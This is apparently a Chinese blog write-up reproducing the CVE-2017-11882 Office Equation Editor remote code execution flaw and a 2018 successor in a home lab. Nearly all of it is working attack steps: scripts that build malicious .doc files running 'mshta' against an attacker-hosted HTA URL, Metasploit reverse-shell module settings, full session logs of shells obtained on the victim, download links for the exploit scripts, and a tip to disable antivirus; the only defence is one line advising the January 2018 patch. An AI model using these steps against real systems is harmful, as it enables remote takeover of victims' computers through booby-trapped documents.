这几天无聊看到一个非常好玩的office远程代码执行漏洞,就来复现了一下......
影响版本:
MicrosoftOffice 2000
MicrosoftOffice 2003
MicrosoftOffice 2007 Service Pack 3
MicrosoftOffice 2010 Service Pack 2
MicrosoftOffice 2013 Service Pack 1
MicrosoftOffice 2016
除了打了补丁了2016版本,几乎都还存在这个漏洞。
需要用到的脚本:https://pan.baidu.com/s/16Qucqp_f-GCkLq3GqSg7DQ 密码:aigk
本地测试环境:
攻击机:kali ip:192.168.103.119
目标机:windows10 + 未打补丁的office2016
提供一个可供测试的office2016版本,需要的可自行下载
链接:https://pan.baidu.com/s/1G9HF4WsJo7_CECTYyJ8N4g 密码:anjg
17年的office噩梦公式一代漏洞:
可以先生成一个可以弹出计算器的漏洞doc文件测试漏洞是否存在
λ python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
[*] Done ! output file >> test.doc <<
然后用office打开,如果弹出计算器,说明存在这个漏洞,我用windows10虚拟机测试
然后我们可以利用msf生成漏洞doc拿shell
使用metasploit,将脚本PS_shell.rb放到metasploit exploit放攻击模块的目录里,一般kali默认目录是
/usr/share/metasploit-framework/modules/exploits/windows/smb
然后启动msfconsole就可以开干了......
使用PS_shell攻击模块:
msf > use exploit/windows/smb/PS_shell
msf exploit(windows/smb/PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/smb/PS_shell) > set lhost 192.168.103.119
lhost => 192.168.103.119
msf exploit(windows/smb/PS_shell) > set uripath test
uripath => test
msf exploit(windows/smb/PS_shell) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.103.119:4444
msf exploit(windows/smb/PS_shell) > [*] Using URL: http://0.0.0.0:8080/test
[*] Local IP: http://192.168.103.119:8080/test
[*] Server started.
[*] Place the following DDE in an MS document:
mshta.exe "http://192.168.103.119:8080/test"
[*] Sending stage (179779 bytes) to 192.168.103.44
[*] Meterpreter session 1 opened (192.168.103.119:4444 -> 192.168.103.44:61506) at 2018-09-21 20:20:11 +0800
然后连接到这个地址,使用脚本生成带有漏洞的攻击文件:http://192.168.103.119:8080/test
C:\Users\k-ring\Desktop\office噩梦公式
λ python Command_CVE-2017-11882.py -c "mshta http://192.168.103.119:8080/test" -o test.doc
[*] Done ! output file >> test.doc <<
因为只是复现这个漏洞,所以我就直接将文件拖到我的被攻击的windows10虚拟机了,然后用office打开这个文件。
[*] 192.168.103.44 PS_shell - Delivering payload
[*] Sending stage (179779 bytes) to 192.168.103.44
[*] Meterpreter session 2 opened (192.168.103.119:4444 -> 192.168.103.44:61552) at 2018-09-21 20:28:24 +0800
sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows DESKTOP-9UJB901\Kr @ DESKTOP-9UJB901 192.168.103.119:4444 -> 192.168.103.44:61506 (192.168.103.44)
2 meterpreter x86/windows DESKTOP-9UJB901\Kr @ DESKTOP-9UJB901 192.168.103.119:4444 -> 192.168.103.44:61552 (192.168.103.44)
msf exploit(windows/smb/PS_shell) >
可以看到已经成功反弹会话,输入sessions就可以看到连接的会话了,id为1是我之前测试时留下的,id为2是这次攻击反弹的shell。
输入 sessions 2 ,然后再输入shell,就可以连接到这个shell。
msf exploit(windows/smb/PS_shell) > sessions 2
[*] Starting interaction with 2...
meterpreter > shell
Process 3872 created.
Channel 1 created.
Microsoft Windows [▒汾 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
desktop-9ujb901\kr
C:\Windows\system32>
参考链接:https://www.cnblogs.com/Hi-blog/p/7878054.html#autoid-3-1-0
18年的office噩梦公式二代漏洞:
进入msf,使用模块,设置参数
msf > use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set LHOST 192.168.103.119
LHOST => 192.168.103.119
msf exploit(windows/misc/hta_server) > set LPORT 8888
LPORT => 8888
msf exploit(windows/misc/hta_server) > set SRVHOST 192.168.103.119
SRVHOST => 192.168.103.119
msf exploit(windows/misc/hta_server) > set target 1
target => 1
设置target时,如果要攻击的目标是x86,就设置为0。
可以exploit运行
msf exploit(windows/misc/hta_server) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 192.168.103.119:8888
msf exploit(windows/misc/hta_server) > [*] Using URL: http://192.168.103.119:8080/3BFm7FwMZn1s.hta
同样会得到一个链接 http://192.168.103.119:8080/3BFm7FwMZn1s.hta
使用噩梦公式二代里面的脚本生成带有命令执行的doc文件
C:\Users\k-ring\Desktop\office噩梦公式\office噩梦公式二代
λ python RTF_11882_0802.py -c "mshta http://192.168.103.119:8080/3BFm7FwMZn1s.hta" -o test1.doc
___ ___
/\ \ /\__\
/::\ \ ___ /:/ _/_
/:/\:\__\ /\__\ /:/ /\__\
/:/ /:/ / /:/ / /:/ /:/ /
/:/_/:/__/___ /:/__/ /:/_/:/ /
\:\/:::::/ / /::\ \ \:\/:/ /
\::/~~/~~~~ /:/\:\ \ \::/__/
\:\~~\ \/__\:\ \ \:\ \
\:\__\ \:\__\ \:\__\
\/__/ \/__/ \/__/
[*] Done ! output file --> test1.doc
然后我也是直接拖到windows10虚拟机中用office打开,触发漏洞,反弹了一个会话,使用sessions可以查看会话
[*] Server started.
[*] 192.168.103.44 hta_server - Delivering Payload
[*] Command shell session 1 opened (192.168.103.119:8888 -> 192.168.103.44:61612) at 2018-09-21 20:39:08 +0800
sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Microsoft Windows [_ 10.0.10240] (c) 2015 Microsoft Corporation. All rights r... 192.168.103.119:8888 -> 192.168.103.44:61612 (192.168.103.44)
同样输入sessions -i 1 可以连接shell
msf exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
Microsoft Windows [▒汾 10.0.10240]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
desktop-9ujb901\kr
C:\Windows\system32>
参考链接:https://blog.csdn.net/DarkHQ/article/details/80454965
现在常见的杀毒软件都可以识别这个漏洞,所以想要复现需要关闭杀软。
解决办法:
更新2018年1月的微软安全补丁